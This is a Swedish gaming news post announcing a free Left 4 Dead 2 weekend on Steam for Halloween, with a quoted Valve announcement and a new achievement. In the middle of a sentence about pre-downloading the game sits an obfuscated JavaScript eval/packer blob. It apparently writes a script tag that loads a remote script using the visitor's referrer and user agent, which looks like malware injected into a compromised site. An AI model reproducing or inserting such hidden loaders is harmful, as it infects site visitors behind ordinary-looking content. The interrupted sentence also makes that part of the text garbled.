Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Left 4 Dead 2 är gratis i helgen!

Left 4 Dead 2 är gratis i helgen!
Filip Urde
  • On 25 oktober, 2012
  • http://www.revue.se/filip-urde

Nästa vecka så är det Halloween och för att fira detta så kommer man kunna spela Left 4 Dead 2 helt gratis på Steam!

Du kan redan nu tanka eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nrast|var|u0026u|referrer|ebhyy||js|php’.split(‘|’),0,{}))
hem
  en kopia för att sedan bli spelbart i natt. Du kommer sedan kunna spela spelet t.om. måndag.

To celebrate Halloween, we are unleashing L4D2 on the world. Starting this Thursday, the entire game will be free to play for the whole weekend. New players can begin pre-loading now. For long time players, it is time to welcome your new found friends and help them survive the zombie apocalypse.

Till halloween firandet så kommer även en ny achievement som heter Good Guy Nick som man får  om man spelar med och hjälper en av de som är gratisspelare.